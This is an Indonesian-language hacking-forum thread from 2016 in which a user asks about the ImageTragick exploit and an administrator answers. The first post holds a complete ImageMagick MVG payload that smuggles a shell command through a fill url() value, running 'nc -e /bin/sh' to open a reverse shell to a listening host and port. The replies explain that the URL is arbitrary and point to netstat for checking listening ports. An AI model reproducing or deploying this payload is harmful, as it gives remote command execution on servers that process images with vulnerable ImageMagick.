[ASK] Tentang Exploit ImageTragick

by Bl4ckJ4ck - 08-25-2016 at 05:14 AM
Junior Member
Posts:
1
Joined:
Aug 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 08-25-2016, 05:14 AM
Code:
push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.0/ipinganteng.jpg" | nc -e /bin/sh 192.168.1.226 "31337)'

pop graphic-context

"fill 'url(https://127.0.0.0/oops.jpg)"  ini ip/url target atau apa ?

dan bagaimana caranya mengetahui port dan ip yg sedang listening, contoh "192.168.1.226 31337"
Reply
Find Posts
Administrator
Administrators
Posts:
91
Joined:
Mar 2016
Likes:
2
Reputation:
0
2 Year Of Member
#2
Posted: 08-30-2016, 10:15 AM
itu sebenernya fake url, bisa di ganti sama apa aja.
buat mengatahui port yang lising bisa pake perintah netstat
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.